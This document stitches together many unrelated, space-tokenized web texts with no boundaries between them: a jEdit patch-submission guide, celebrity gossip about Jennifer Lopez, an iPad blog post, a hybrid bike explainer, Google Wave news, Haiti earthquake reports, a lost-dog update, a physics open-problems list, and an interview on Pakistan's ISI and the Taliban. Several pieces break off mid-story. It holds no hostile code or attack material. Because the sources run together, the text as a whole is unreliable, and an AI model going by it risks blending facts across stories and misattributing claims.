Fixing plugin or core bugs
Even if you can't fix a bug yourself , you can still help in its eventual resolution by adding useful comments or metadata to the existing tracker items .
If you want to help in categorizing or closing bugs , just ask for tracker admin permissions from one of the existing project admins .
If you want to make changes to existing plugins , or jEdit itself , make sure that you are working on the latest released ( i.e. development ) versions .
Until you are ready to commit directly , you can submit your patches via the jedit patches or plugin patches trackers , as an attachment or a comment in the actual tracker item .
After you have submitted a few patches , you can ask for permission to commit directly .
Creating and submitting Patches
We prefer patches which are generated against the latest " trunk " in subversion .
By checking out a copy of the source and making changes to your local copy , you can create a patch by simply typing svn diff , ( or git diff , if it 's in git ) from the root directory of your project .
This command will give you context , as well as version numbers for all differences between your versions and the versions you checked out from the repository .
Redirect this command to a file and attach it with proper documentation to a patches tracker item .
Adding plugins to the Subversion or Git repository
To get an account on the sourceforge jedit project , first you need a Source Forge user account .
Once you feel your plugin is reasonably complete ( this should be determined partly by feedback you get during the development process ) , you can post your submission on the submissions tracker .
At this point , it will become a candidate for release on plugin central .
See this page to find out how .
Thanks
Special thanks to sourceforge. net for hosting and providing for free , the SVN , GIT , web hosting , file releasing , and bugtracking services we 've needed to collaborate with each other for over 10 years of jEdit 's development .
Thanks to the Giant Java Tree , which hosted the jEdit CVS and web site for the first 3 years of jEdit 's development .
Thanks to all of the volunteers who have added their own personal touch and helped make this program and its related services what they are .
Jennifer Lopez brands Sarah Palin 'a b***h' in Spanish slang on TV
Hollywood A - listers are normally well versed in hiding their true opinions .
So it's all the more surprising that Jennifer Lopez has labelled former Vice Presidential candidate Sarah Palin 'la cabrona ' - Mexican slang for ' bitch ' .
The star made the declaration during U.S. TV show Lopez Tonight .
Action girl : Jennifer Lopez tried her hand at presenting as she made a surprise cameo appearance guest - hosting George Lopez 's show
Showing off her moves : J
Lo soaked up the audience 's wild applause
Former governor of Alaska Sarah Palin
The show is hosted by George Lopez , but to the delight of the audience Jennifer appeared onstage and launched into a stand - up routine .
' Welcome to ' Lopez Tonight , ' she said .
' Where nobody gets fired - they just get replaced by a bigger star with the same last name . '
She then commented on former Alaska governor Palin .
To laughter from the audience Lopez continued her routine , before her namesake returned to the stage .
The singer , 40 , wore a white suit with cut out panels for her starring moment .
It was from Hussein Chalayan Spring 2010 's collection .
She is currently promoting her new film role , which sees her star as a career - driven single woman who , tired of waiting for the right guy to have a baby with , decides to have a child using In vitro fertilisation .
I remember when Apple released the iPod Mini .
I wrote about it .
At the time , people complained that it was underpowered and overpriced .
The iPod Mini became Apple ’s bestselling iPod .
Yesterday , Apple announced a new product , the iPad .
Already the whining has begun about how no one will use it and they can’t possibly see how this device will fit into their lives .
And I understand completely the thinking .
I have a smartphone .
I have a laptop .
I do n’t need another device .
Nope , I do n’t .
But it ’s not about need .
Just like with the lower capacity iPod Mini ( it had 4GB of storage for $ 249 ; normal iPods had 40 times that amount for an extra $ 150 ) , people are only looking at bullet points .
I am willing to bet that people will find a place for the iPad in their lives once they walk into an Apple store and touch one .
I do a lot of reading on my iPhone and my Kindle .
The problem with each is that one is better at one kind of thing than the other .
An iPad , theoretically , removes the Kindle as a need as a reader .
That I can browse the web or use a dedicated app of some kind ?
Gravy .
I like the Kindle .
I like it .
I do not LOVE it .
I liked cell phones in my past .
I LOVE my iPhone .
This is what Apple does .
They build devices you love .
I hate to mention gender here , but I think it ’s important in Apple ’s history .
The first iBooks were routinely loved by women .
The orange , blue and gray models were funky , fun and unusual .
They looked out of place in your office .
But they sold .
Heather ’s first Mac purchase was a 2002 iBook .
The iPad is not something that is a “ serious ” computing device in the sense that I strap in and “ get busy ” for hours on end .
The use case I see is that an iPad ( or two , especially at the lowest price point ) becomes something that sits around the house and you pick it up and use it for 10 - 30 minutes at a time .
Might be used as a reader , photo browser , web browser but only for short bursts .
I do see it as a better way to read websites in bed .
I do this now with my laptop ( and I imagine I ’m not alone ) and I hate that I ca n’t slouch or lay on my side and surf the web easily .
I try to do this with the iPhone , but it ’s so small I have to hold it up to my face to read stuff .
After more than a few minutes , it ’s not too comfortable .
While the iPhone has saved me and paid for itself many times over in productivity gains and in bailing me out when I need to do something remotely and ca n’t use a laptop or desktop machine , it ’s not the best reader in the world .
However , it does have a touch interface and that ’s very nice when reading .
The iPad is a couch / bed / slouch device .
It ’s a sit back and relax device .
It ’s not a productivity enhancer or new way to take your office on the road .
It ’s just a device to hit a couple of sites , play a round of a game or two and then go make dinner .
One commenter said something similar on my post yesterday .
When I travel and use my iPhone on the plane extensively ( and even if I do n’t ) , I have to do so with an external battery pack , because using the iPhone as a reader / gaming device / iPod on a plane often means having little battery power when I land .
Given the nature of our recent business moves , this has become critical .
It would be more comfortable to replace the Kindle with an iPad and be able to read from that , saving my phone for actual phone usage when I land .
You might think I ’m nuts , but it ’s just how I travel .
The other thing is that opening a laptop in a coach seat on an airliner is next to impossible these days , especially with anything larger than a netbook .
Which reminds me that people who do serious computing with a netbook are not the target for this device .
I really think that the iPad may have a similar attraction to women looking to buy a Kindle or a laptop for more casual use .
It ’s nutty to think about “ casual ” and “ computing ” in the same sentence , but gamers said the same thing about Nintendo ’s Wii .
Pros looking for a new form factor portable tool are likely not the target .
Nerds are not the target .
People who read or want a less formal computing experience are totally the target .
One side note : I ’ve loved being able to take photos on my iPhone , edit them in different apps on the phone and then upload them from the phone to flickr .
In particular , I love TiltShift Generator for it ’s interface use of applying blurs .
I imagine that apps like TiltShift on the iPad will open up new , fun ways to use the device that we ca n’t see yet .
Whether those will compel fence sitters to buy an iPad remains to be seen .
Finally , another thing that separates Apple from a lot of companies is that Apple is n’t afraid to kill a product and replace it with something it thinks is better .
18 months after announcing the iPod Mini , Apple killed it and replaced it with the iPod Nano .
Since 2005 there have been five product revisions to the iPod Nano , almost all of them changing the form factor and feature sets .
The iPad is the first generation of hopefully an interesting and increasingly more useful product line .
Will I buy one ?
Yes .
When ?
Soon .
KATHMANDU : Nepal will play host to a royal wedding with a difference when an openly gay Indian prince marries his partner at a Hindu temple in Kathmandu .
The ceremony is the start of what a Nepalese politician , Sunil Babu Pant , hopes will become a lucrative business for his country , whose tourist industry is still reeling from the effects of a decade - long civil war that ended in 2006 .
Manvendra Singh Gohil ... will marry in Kathmandu .
Mr Pant , the first openly gay MP in Nepal , has set up a travel agency catering for gay tourists , who he says face severe discrimination in many Asian countries .
'' The choices [ for gay tourists ] in this region are very limited , and there is really no competition from China or India , '' said Mr Pant , who was selected in May 2008 to represent a small communist party in parliament .
A hybrid bike is one that blends the best characteristics of both road and mountain bikes into a bike that is sturdy , comfortable and fast , and ideal for riding on streets and bike paths .
Features of Hybrids That Come from Mountain Bikes
A more upright frame , offering a more comfortable riding position
A stouter frame that can handle more weight -- from the rider and / or cargo -- as well as absorb the day - in , day - out punishment of potholes that you might encounter in a commute
Slightly wider tires for better traction and stability
Features from Road Bikes
Lighter rims for faster riding
Lighter components and taller gearing for going faster
For sure , the tires on a hybrid bike are a true combination of what you find on road and mountain bikes .
Wider , like a mountain bike for greater stability and durability , but then with a higher recommended air pressure that puts them in the same level as a road bike when it comes to inflation level .
The higher air pressure allows them to go faster by reducing rolling resistance .
Think about how a properly inflated basketball bounces compared to one that is even slightly flat .
Same concept .
The rims and spokes on hybrids are lighter too like a road bike since the assumption is that you wo n't be doing the rougher off - road riding that mountain biking entails .
Frame
Most hybrid bike frames are made of lightweight aluminum or steel due to the strength and durability the materials offers and their ( relatively ) low price .
Handlebars
The handlebars on a hybrid are typically flat like a mountain bike and go straight out from the stem .
With a wider grip , usually about shoulder width , these handlebars allow riders to sit upright and offer a better position for vision and control of the bike than the handlebars on a road bike .
Riding position
Like a mountain bike , a hybrid 's design allows riders sit upright in a position that gives the best control of the bike with a well - placed center of gravity and in a posture that reduces strain on the rider 's neck and back .
Gears
Hybrids have a wide range of gearing to allow the rider to both climb hills and go fast on flats and downhills .
Not usually equipped with gears in as low range as a mountain bike , the hybrid 's gearing set - up is more similar to road bikes .
Typically a hybrid bike will have either two or three chainrings in the front as part of the crank assembly , again along the lines of what you ’d find on a road bike .
In the back you 'll find eight or nine gears in the cassette on the rear wheel , a combination that allows for anywhere from 16 to 27 possible gear combinations , which will account for virtually every need a hybrid rider will have in town or on the bike path .
Pedals
Basic hybrids bikes come equipped with platform pedals .
This is useful if you ’re the type of rider who frequently puts your feet down .
Other more advanced riders may prefer to use toe clips or even clipless pedals that allow the rider to secure his or her cleated shoes to the pedals , but people have different levels of comfort when it comes to being fully attached to the bike given the frequent stops you might encounter riding in traffic .
Accessories
for a hybrid bike might include a cyclocomputer , frame pump , tool bag , water bottle , and cage .
This is about all you need to be self - sufficient when riding in town .
Buying Advice
A hybrid is a good choice for much in - town riding .
The key to getting a good bike is to find one with decent components .
It is these moving parts that will determine how well your bike will function and for how long .
Also , if you 're going to be using a hybrid bike for commuting to work or school , check out the accessories that may make your trip easier and more convenient , such as lights , racks , and locks that can come as built - in features with many models .
Not long ago , we broke the news that Google has started sending invites for Google Wave .
The run-up to the launch of Google 's real - time communication tool has dominated both social media and mainstream media chatter for the last few days .
Twitter users have been clamoring for invites ( or trying to buy invites on eBay ) .
So what should you expect when you first get your invite and enter Google Wave ?
Well we know the answer .
Mashable 's Jennifer Van Grove is the first member of our team to receive a Google Wave invite .
And what was the first thing to greet her as she entered Google 's magical wonderland ?
Why , none other than Google 's friendly tutor , Dr. Wave !
When you open up the Wave interface , you will be greeted by Greg , one of Google Wave 's product manager .
Or , as he is apparently known around the office , " Dr. Wave . "
He introduces you to Google Wave in a very fun and very informative 2 and a half minute video , which we 've embedded below .
Before you watch it though , one note : the video 's meant to be watched while within Google Wave .
Thus , when you see him pointing , he 's supposed to be pointing at the Wave interface .
So you might get a bit disoriented .
In any case , here 's Dr. Wave :
Please : let us know what you think of Dr. Wave and his tutorial in the comments .
BONUS : Extensions Gallery Intro
Here 's yet another intro video fro mthe Wave team , this on on Google Wave extensions :
BONUS # 2 : Google Wave Sudoku Extension
They even demonstrate one of the standard extensions , Sudoku .
Who wants to play me tomorrow ?
You can find the latest updates via a search on Humanitarian News
If you 'd rather use an RSS feed , the same updates can be automatically delivered to you via this customized newsfeed
If you want the updates delivered via email , use the xFruits RSS - to - mail tool .
Where you need to fill in the URL , use :
http://humanitariannews.org/opensearch/node/Haiti%20earthquake
Tuesday afternoon , January 12th , the worst earthquake in 200 years - 7.0 in magnitude - struck less than ten miles from the Caribbean city of Port - au - Prince , Haiti .
The initial quake was later followed by twelve aftershocks greater than magnitude 5.0 .
Structures of all kinds were damaged or collapsed , from shantytown homes to national landmarks .
It is still very early in the recovery effort , but millions are likely displaced , and thousands are feared dead as rescue teams from all over the world are now descending on Haiti to help where they are able .
If you are a humanitarian aid worker , or just generally interested in the situation in Haiti : Picture courtesy Thony Belizaire / AFP / Getty Images
note
To clear up some of the UNIX - heads out there , no , it 's not the CD player program .
That one 's KSCD .
Admittingly , tho , the X in the title throws Unix - heads off because many Unix programs start with the letter X to indicate that it requires an XWindows server ( i.e. XOrg or XFree86 ) , and the actual CD player program is not only also four letters long , but also has the letters K , C and D in it .
However , given how Randall regularly refers to Linux and open - source in the comics , it could be intentional .
ORIGINAL 3:26 PM REPORT : Have received several notes / texts about this – there ’s a dog running on the westbound West Seattle Bridge , reportedly near Admiral and in the left lane / on the shoulder .
First note we received says help ’s been called .
5:22 PM UPDATE : Dog and owner will be reunited , thanks in the end to the folks who e-mailed and texted about the situation .
We also posted to Facebook and Twitter ; long story short , via FB , a friend of the dog ’s owner says the owner has called police , the dog ’s OK , reunion ’s impending .
5:37 PM UPDATE : Owner Christel confirms , in comments :
I HAVE MY DOG BACK !!!!
Thank you all SOOOO much !!!
All the help was amazing !
This is the first time he has ever run away and I had no idea what to do !
The West Seattle Blog , FB and tweeting saved my dog !!!
Thank you to all !
P.S. His name is Arrow .
Love to all !!
And throw in texting and e-mail too ( shoutout to Carrie Ann and Debbie ) .
Glad Arrow is safe .
Sign up for the Newsletter Sign Up
Sign up for our email newsletter for the latest science news
This weekend at Caltech we had a small but very fun conference : the " Physics of the Universe Summit , " or POTUS for short .
( The acronym is just an accident , I 'm assured . )
The subject matter was pretty conventional -- particle physics , the LHC , dark matter -- but the organization was a little more free - flowing and responsive than the usual parade of dusty talks .
One of the motivating ideas that was mentioned more than once was the famous list of important problems proposed by David Hilbert in 1900 .
These were Hilbert 's personal idea of what math problems were important but solvable over the next 100 years , and his ideas turned out to be relatively influential within twentieth - century mathematics .
Our conference , 110 years later and in physics rather than math , was encouraged to think along similarly grandiose lines .
And indeed people had done exactly that , especially ten years ago when the century turned : see representative lists here and here .
I asked the organizers if anyone was taking a swing at it this time , and was answered in the negative .
I was scheduled to give one of the closing summaries , and this sounded more interesting than what I actually had planned , so naturally I had to step up .
Here are the slides from my presentation , where you can find some elaboration on my choices .
And here 's the actual list :
What breaks electroweak symmetry ?
What is the ultraviolet extrapolation of the Standard Model ?
Why is there a large hierarchy between the Planck scale , the weak scale , and the vaccum energy ?
How do strongly - interacting degrees of freedom resolve into weakly - interacting ones ?
Is there a pattern / explanation behind the family structure and parameters of the Standard Model ?
What is the phenomenology of the dark sector ?
What symmetries appear in useful descriptions of nature ?
Are there surprises at low masses / energies ?
How does the observable universe evolve ?
How does gravity work on macroscopic scales ?
What is the topology and geometry of spacetime and dynamical degrees of freedom on small scales ?
How does quantum gravity work in the real world ?
Why was the early universe hot , dense , and very smooth but not perfectly smooth ?
What is beyond the observable universe ?
Why is there a low - entropy boundary condition in the past but not the future ?
Why are n't we fluctuations in de Sitter space ?
How do we compare probabilities for different classes of observers ?
What rules govern the evolution of complex structures ?
Is quantum mechanics correct ?
What happens when wave functions collapse ?
How do we go from the quantum Hamiltonian to a quasiclassical configuration space ?
Is physics deterministic ?
How many bits are required to describe the universe ?
Will ``elementary physics '' ultimately be finished ?
Clearly I cheated somewhat by squeezing multiple questions into single problems .
But the real challenge was thinking sufficiently big to come up with problems that people a century from now would agree are interesting .
And I stuck to " elementary physics " -- particle physics , gravitation , cosmology -- just because I 'm not competent to pick out the important problems in any other fields .
Twenty - four , of course , because Hilbert had 23 , and we had to go one better .
There was certainly no shortage of candidates ; I was coming up with more good problems and throwing out old ones right up until the last minute .
Any obvious ones I missed ?
Hundreds of Haitians joined open - air church services in the capital
The confirmed death toll from Haiti 's devastating earthquake has risen above 150,000 in the Port - au - Prince area alone , a government minister has said .
Communications Minister Marie - Laurence Jocelyn Lassegue said the count was based on bodies collected in and around the capital by state company CNE .
Many more bodies remain uncounted under rubble in the capital , including the towns of Jacmel and Leogane .
The search for survivors has officially ended and the focus has shifted to aid .
But there is disagreement about how well the aid operation is doing , with the head of Italy 's civil protection service making highly critical comments .
Nobody knows how many bodies are buried in the rubble - 200,000 , 300,000 ?
Marie - Laurence Jocelyn Lassegue
Communications Minister Guido Bertolaso , who is in Haiti to co-ordinate relief efforts , also criticised what he saw as the presence of too many American soldiers .
He said they had no training in running a civilian relief operation .
" When there is an emergency , it triggers a vanity parade .
Lots of people go there anxious to show that their country is big and important , showing solidarity " , he said .
He called on the United Nations to establish a procedure to follow when major natural disasters occur .
As the death toll in Haiti has risen , it has become clear the 12 January quake is one of the worst natural disasters to have struck in recent years .
Some say the 7.0 - magnitude quake killed as many as 200,000 people , while an estimated 1.5 million people have been left homeless .
Ms Lassegue said that the authorities were still far from knowing the total number of those killed .
" Nobody knows how many bodies are buried in the rubble - 200,000 , 300,000 ?
Who knows the overall death toll ? " the Associated Press quotes her as saying on Sunday .
Speaking to reporters a day earlier , she said the general hospital had received about 10,000 corpses , which it had handed over to CNE for burial .
At least 75,000 people have been buried in mass graves since the disaster .
Relatives have also burnt the bodies of some of the victims .
' Tremendous need '
Thousands of people joined open - air church services in Port - au - Prince , Leogane - the epicentre of the earthquake - and elsewhere on Sunday .
A day after the funeral of the capital 's Roman Catholic archbishop , Father Glanda Toussaint celebrated Mass at an altar improvised on a wooden table by the wrecked cathedral .
HAITI 'S REMARKABLE SURVIVORS
Wismond Exantus , 24 - pulled out alive after 11 days Emmannuel Buso , 21 - rescued after 10 days Marie Carida , 84 - saved after 10 days Mendji Bahina Sanon , 11 - trapped for eight days Lozama Hotteline , 25 - pulled out after seven days Elisabeth Joassaint , 15 days - buried for seven days , half her life Ena Zizi , 69 - rescued after seven days
Haiti quake : Survivors ' stories ' An extraordinary operation '
He told his congregation : " What we are going through is not finished , we must reconstruct the country and reconstruct our faith .
As a Haitian , it hurts . "
Haitian - born rapper Wyclef Jean , who set up the charity foundation Yele Haiti , arrived in the capital on Sunday .
He was expected to meet officials and help distribute aid to people left homeless .
He was among a number of high - profile artists to take part in a " Hope for Haiti Now " telethon in the US on Friday which raised more than $ 57 m ( £ 35 m ) for the aid effort .
Meanwhile , BBC correspondents in Port - au - Prince report a few signs of normal life returning to the city , with street stalls starting to sell fruit and vegetables and some shops and banks re-opening .
Queues to withdraw cash have been long , as prices for what is now on sale have increased dramatically and many Haitians have been without access to money for days .
The UN says more than 130,000 people have now been relocated out of Port - au - Prince by the authorities , easing the pressure on overcrowded camps in the city .
Others have left independently .
Foreign ministers will discuss plans for reconstruction at an international donor conference to take place in the Canadian city of Montreal on Monday .
BBC HAITIAN CREOLE SERVICE Broadcasting on FM radio daily in Haitian Creole at 0910 local time ( 1410 GMT ) , for 20 minutes Giving up - to - date information about where to get basic services and aid Also available on satellite and online , and via social media
BBC Caribbean Hours after Haiti's government declared a formal end to the search for survivors on Saturday , a 24 - year - old man was pulled alive from the remains of a hotel in the capital after 11 days under the rubble .
Rescuers described his survival as " a miracle " .
Onlookers cheered as Wismond Exantus - smiling and apparently in a good condition - emerged on a stretcher from what remains of the Napoli Inn Hotel .
He later told reporters that soft drinks and snacks had kept him going .
A French medic said he could expect to leave hospital within a day or two .
The BBC's Orla Guerin in Port - au - Prince says doctors believe he will make a full recovery .
Speaking to the BBC , Mr Exantus appealed for search and rescue efforts to continue so that others could share his chance of rescue .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Erik Naggum comp.lang.lisp archive
This site contains 5,121 articles that the late Erik Naggum posted to the Usenet group comp.lang.lisp .
Zach Beane derived it from Ron Garret 's archive file .
More info ....
If you have any questions or comments about this archive , please email Zach Beane .
Search
You can prefix a search term with - to exclude it from the results , e.g. lisp - clos or - re : .
You can also search for phrases , e.g. " logical pathname " .
Indexed by Year
PORTSMOUTH — PaganFM ! , a radio program and Pagan podcast , originating at WSCA-LP , 106.1 FM in Portsmouth , and Circle Sanctuary , located near Barneveld , Wis , m have embarked on a collaborative effort , with the support of musicians from around the world , to create a music album , the proceeds from which will be used to provide assistance to the recovery and rebuilding efforts in Haiti .
In less than one week , this project has grown from mere idea , to a collaborative effort spanning multiple countries and continents .
All of these people have come together with the single goal of bringing healing to a shattered landscape .
Pagan musicians and bands from Australia to Canada are taking part ; some are very well - known , others are up and coming , and still others are well - established but have more limited audiences .
The music on the album ranges from folk , to rock to ethnic and beyond .
This album will be an opportunity for each of them to use their talents and skills to open the hearts of listeners across the planet , encouraging everyone to unite in purpose .
The proposed release date for this album is the first week in March .
Local organizers are hoping to have a release party at WSCA in Portsmouth .
Release parties are being planned in the areas where groups of the artists happen to be from .
We 're hoping to have another party in the Toronto area , one at Circle Sanctuary in Wisconsin , and another in Australia .
A correspondent for The New Yorker , Coll is the Pulitzer Prize - winning author of Ghost Wars : The Secret History of the CIA , Afghanistan and Bin Laden , From the Soviet Invasion to September 10 , 2001 .
Here , he recounts how the Taliban organized and gained power in Afghanistan with assistance from Pakistani intelligence , and how some in Pakistan 's intelligence community were reluctant to switch their allegiance after President Musharraf made the decision to ally with the U.S. after 9/11 .
He also describes the complicated balancing act that has resulted from this decision , describing Musharraf as a " weak " U.S. ally .
" The next attack against the United States may well have roots in this failed state or emerging failed state , " he warns .
" What are the U.S. and its allies going to do about this problem then , and why is n't it being addressed now ? "
This is the edited transcript of an interview conducted on July 20 , 2006 .
Some highlights from this interview
The history of the Taliban - Pakistan alliance
Who is Jalaluddin Haqqani ?
Was Al Qaeda tipped off about where to cross the border ?
The Taliban 's current strategy
How do we understand the relationship between the ISI [ Pakistan 's Inter - Services Intelligence ] and the Taliban ?
The Taliban arose in the fall of 1994 and sort of presented themselves as a fact on the ground in southern Afghanistan and rather quickly made contact with the Pakistan army and with the chief of its intelligence service .
There was a meeting at ISI headquarters with some of the early leaders of the Taliban -- not Mullah Omar , but some of his aides -- and the ISI chief in the late autumn of 1994 .
It was a get - to - know - you , introductory meeting .
From that beginning , the ISI became more and more involved with the Taliban as the Taliban increased its ambitions in southern Afghanistan .
Throughout 1995 , the collaboration between ISI and the Taliban increased , and it changed character .
It became more and more of a direct military alliance .
The ISI was itself divided in this period of the Taliban 's emergence about how to conduct its policy in Afghanistan , who to favor .
The ISI , during a long period of the anti-Soviet war , had been closest to Gulbuddin Hekmatyar , a Pashtun commander , an Islamist .
But by the 1990s , Hekmatyar was no longer effective , at least in the judgment of many within ISI .
...
The Taliban gradually proved themselves as the better client .
They became more effective militarily , and it became increasingly clear that something about their austere discipline appealed to ordinary Pashtuns , at least in the south and east of Afghanistan .
You describe them as a client of the ISI .
They received guns ; they received money ; they received fuel ; they received infrastructure support .
They also , we know , had direct on - the - ground support from undercover Pakistani officers in civilian clothes who would participate in particular military battles .
Is it a fair characterization to say that the Taliban were an asset of the ISI ?
They were an asset of the ISI .
I think it 's impossible to understand the Taliban 's military triumph in Afghanistan , culminating in their takeover of Kabul in 1996 , without understanding that they were a proxy force , a client of the Pakistan army , and benefited from all of the materiel support that the Pakistan army could provide them , given its own constrained resources .
So where does the ISI stand vis -à - vis the Taliban just prior to 9/11 ?
The Taliban remained an important client of the ISI right up until 9/11 .
They were an ally of the Pakistan government , and the ISI maintained contact with them to support their governance , but also their military campaign in the Afghan civil war that persisted despite the Taliban 's takeover of Kabul .
The Taliban were important to the ISI in the late 1990s for another reason .
The ISI also promoted a rebellion against what it regarded as Indian occupation in Kashmir .
The Taliban in Afghanistan provided logistical support , training and other bases that the ISI could use to train and develop its Kashmir rebellion as well .
And Al Qaeda had a hand in that as well ?
Some of the camps that were used by the ISI to train Kashmiri militants were managed on the ground by Al Qaeda .
And ISI 's relationship with Al Qaeda , therefore , is what ?
It 's a less intimate relationship than ISI 's relationship with the Taliban .
The ISI had a sort of transactional relationship with Al Qaeda that was mostly focused on training of Kashmir militants .
There were some sources of collaboration at the sort of colonel level of ISI , but there was not a strategic partnership between ISI and Al Qaeda , certainly not prior to 9/11 .
There were also sources of tension between ISI and Al Qaeda .
So on 9/11 , the United States , the president says , " You 're either with us or against us . "
Suddenly it puts [ Pakistani President Pervez ]
Musharraf and his military and his ISI in a very difficult position .
Can you describe that ?
The Pakistan army is a very disciplined organization .
But within that army , ISI has always enjoyed a kind of autonomy , and it 's sort of a division that is quite different from anything else in the Pakistan army .
When Musharraf decided to change policies after 9/11 , he had to bring ISI under control .
While he enjoyed support from many senior generals in the Pakistan army , down in the ranks of ISI , he had to deal with an organization that had been so close to the Taliban and was , in many cases , sympathetic to Al Qaeda that he could n't be sure of its loyalty .
Describe that .
...
Well , it 's interesting .
ISI is essentially a division of the Pakistan army , and it 's organized on military lines .
...
Typically , in the Pakistan military , as in other militaries , officers rotate through assignments every two or three years .
But within the Afghan bureau of ISI , some of the key figures have been assigned to this work for 10 or more years .
The reason is that they have the relationships with key Pashtun and Afghan militants that are essential to Pakistan 's statecraft in Afghanistan .
So a lot of these colonel - level , major - level , captain - level ISI officers working on the Afghan frontier have been left in place for long periods of time .
They have developed close relationships with their clients .
They seem , in some cases , to have come to identify with their clients ' causes .
So when Musharraf decided to clean up , he had to deal with these loyalties down in the middle of the ISI bureaucracy .
And if he moved too aggressively and alienated those officers and their sympathizers in the army , he could create a real problem for himself .
Well , how deep did he go ?
He started at the top -- that was the easiest thing to do -- and he removed the director general of ISI .
As he installed leaders who were in tune with his new policies , those leaders began to evaluate personnel down through the ranks , and they did make some changes , certainly at the brigadier general level .
However , as I understand it , in the Afghan bureau , there are still officers on the front lines working on the Afghan problem who were there back in the good old radical days of the 1990s , and in some cases earlier -- men who have worked with Islamists , the Taliban , some of their predecessor groups , for a long time .
They 're still there doing that work .
Why ?
I think it 's a mystery .
Does Musharraf want to have it both ways ?
Does he leave these officers in place because he appreciates the work that they 're doing , or is he unable to really clean house in ISI right down to the bottom ?
What 's the answer ?
It 's always been a question about ISI right back to the early ' 80s .
Does the commander of the Pakistan army really have the power to control ISI 's agenda ?
Or is , in fact , ISI an instrument of a kind of double game that Pakistan plays in which at the very top a leader like Musharraf can manage a relationship with the United States and take the benefits of that relationship -- the military aid , the aircraft , the weapons systems , the economic aid -- but then down in the ranks on the Afghan frontier carry out a very different policy without ever being held accountable for that policy ?
What happens to those guys down in the ranks who are on the Afghan frontier , in the tribal areas , after 9/11 , and they understand that their president is asking for their policies to be reversed ?
There was a great deal of disagreement within the Pakistan army and ISI about Musharraf 's decision to wage war against the Taliban .
This was for many officers a shock .
After all , the Taliban had been , while sometimes ornery and independent - minded and not so easy to manage and control in the field , nonetheless , they 'd been friends of Pakistan .
And they had carried out a series of military and even diplomatic campaigns that had isolated the Taliban , but which had been in tandem with Pakistan 's own policies .
So to betray them at the instigation of the United States would have come as a shock to certainly some portion of the front - line officers in ISI who were working on the Afghan frontier .
Can you speak about it anecdotally ?
...
I think the most interesting anecdote in the fall of 2001 involves Jalaluddin Haqqani .
Jalaluddin Haqqani is a very important figure still in the world .
He was a very important figure in the 1980s .
He was a late convert to the Taliban , and he has had a long and very close relationship with ISI and particularly with the Afghan bureau of ISI .
During the 1980s , Haqqani received an extraordinary share of the CIA - funded and Saudi - funded war materiel that were shipped to the Afghan front .
During the 1990s , he remained a very important commander and also a fund - raiser because of his connections in the Persian Gulf .
He was an independent - minded fighter , and the Taliban wanted him on their side .
At some stage in the 1990s , he agreed to sort of fly under the Taliban flag , and he became , eventually , interior minister in a Taliban government .
But there was always a question about whether Haqqani was really Taliban , because he had n't come out of Kandahar ; he was n't part of the core group .
And it was quite reasonable to believe after 9/11 that maybe he could be flipped .
At the moment that the United States and Pakistan began to think about , well , how are we going to defeat the Taliban militarily , the idea of persuading Haqqani to change sides quickly occurred to them .
They summoned him to Pakistan , and they had a series of meetings with him , the content of which is unknown .
There was some hope that he would , for money or for the sake of Pakistan 's new policy , change his loyalty .
But he did n't .
He left unmolested , went back to the Afghan frontier , and has been waging war ever since , in some sense , against both Pakistan and the United States .
Now , the ISI officers who worked with Haqqani , who had been his partners over a long period of time , their loyalties were clearly divided at the same time that Haqqani himself was trying to make a decision .
I think it 's quite reasonable to assume that the decision that Haqqani made to reject these treaties , to in effect betray the Taliban , that his feelings were shared by many of his collaborators within the ISI .
...
After 9/11 and the bombs start to fall on Afghanistan , there are a large number of Pakistanis , are n't there , that go across the border to fight ?
The Taliban drew , with ISI 's support , on a large number of volunteers who came often out of madrassas that were located near the Afghan frontier , sometimes out of Karachi , [ Pakistan ] .
The ISI had quite systematically built up an identification of fervent interest between these young Pakistanis and the Taliban cause .
And of course after 9/11 , many of these young Pakistanis saw not that there was a reason to change sides , but that there was more reason than ever to defend the Taliban against the United States .
So it 's just another superpower , in their view ?
It was just another superpower , but also it was a superpower that was coming from outside into this land to destroy what many of these Pakistanis regarded as a righteous Islamic government .
...
The Taliban depended , right up until 9/11 , on an infrastructure that was rooted in Pakistani religious parties that were themselves managed in some important way as clients by ISI .
If you were a volunteer to join the Taliban , whether you were a Pakistani or a foreign Arab , you arrived in Karachi and you passed through infrastructure that was quite striking in its size and robustness .
Schools , bus companies , guesthouses -- the whole system was a war - fighting system , because many of these volunteers prior to 9/11 were needed to wage war against the Northern Alliance in Afghanistan .
That was why there was such a broadly based infrastructure when the Taliban themselves came under assault after 9/11 .
I think another thing that 's important … just to throw into the mix about ISI :
On the Afghan frontier , ISI 's work is inseparable from the role of the religious parties .
These religious parties have been competing for power in Pakistan since its birth , and the wars in Afghanistan , beginning in the 1980s and again in the 1990s , strengthen them .
They strengthen them by allowing them to raise money they could never raise before , by discrediting old secular leaders .
Gradually , these parties have come to dominate social and political infrastructure that they used to only look at from the outside .
These religious parties are crucial because they have money ; they have schools ; they have buses ; they have political office now .
And particularly since 9/11 , they have gained political power both in the North West Frontier Province [ NWFP ] and in Baluchistan , where they share power .
And they had access to all the infrastructure of regional government in Pakistan , so they control ministries ; they control budgets ; they control cars .
ISI , while a formidable organization , may not even have the resources now that some of these religious parties enjoy , particularly in the North West Frontier Province .
And some of the players in the ISI were very close [ to ] or involved with political parties , right ?
One of the ISI 's functions since the 1970s has been to manage and in some cases manipulate political elections in Pakistan .
In particular , the election that brought the religious parties to power on the Afghan frontier was one where , at least in the view of many Pakistanis , the ISI was heavily involved .
It 's a question as to whether Musharraf wanted these religious parties to come to power as a check on his rivals in secular Pakistan politics or whether their victory in the North West Frontier and also in Baluchistan was [ to ] some extent a kind of Frankenstein accident where ISI was trying to build them up to a certain level , but then it turned out that they were even more popular than ISI believed .
It would be very interesting to hear the conversation that ensued after election day between Musharraf and his ISI chief as to whether it was " Job well done " or " What have you gotten me into ?
I asked you to strengthen them a little bit , but not so much . "
[ What happened after the Americans started air attacks in Afghanistan ? ]
Increasingly in the south and east , it became impossible for remnant Taliban and Al Qaeda to hold ground .
They were being overtaken not only by air attacks when they gathered in one place and exposed themselves , but also increasingly by the combination of new tribal militias that were funded by the United States and American ground forces as they began to roll out in small teams .
It became increasingly dangerous for remnant Taliban , Pakistani volunteers and Al Qaeda Arabs to remain in Afghanistan .
Tora Bora was essentially the end of their effort to hold ground outside of perhaps Oruzgan [ Province ] .
They withdrew that December into the Federally Administered Tribal Areas [ FATA ] of Pakistan , where they could be sure that if they gathered together in one place , they would not immediately attract American air strikes if they were identified .
But the Americans asked the Pakistanis to block the border .
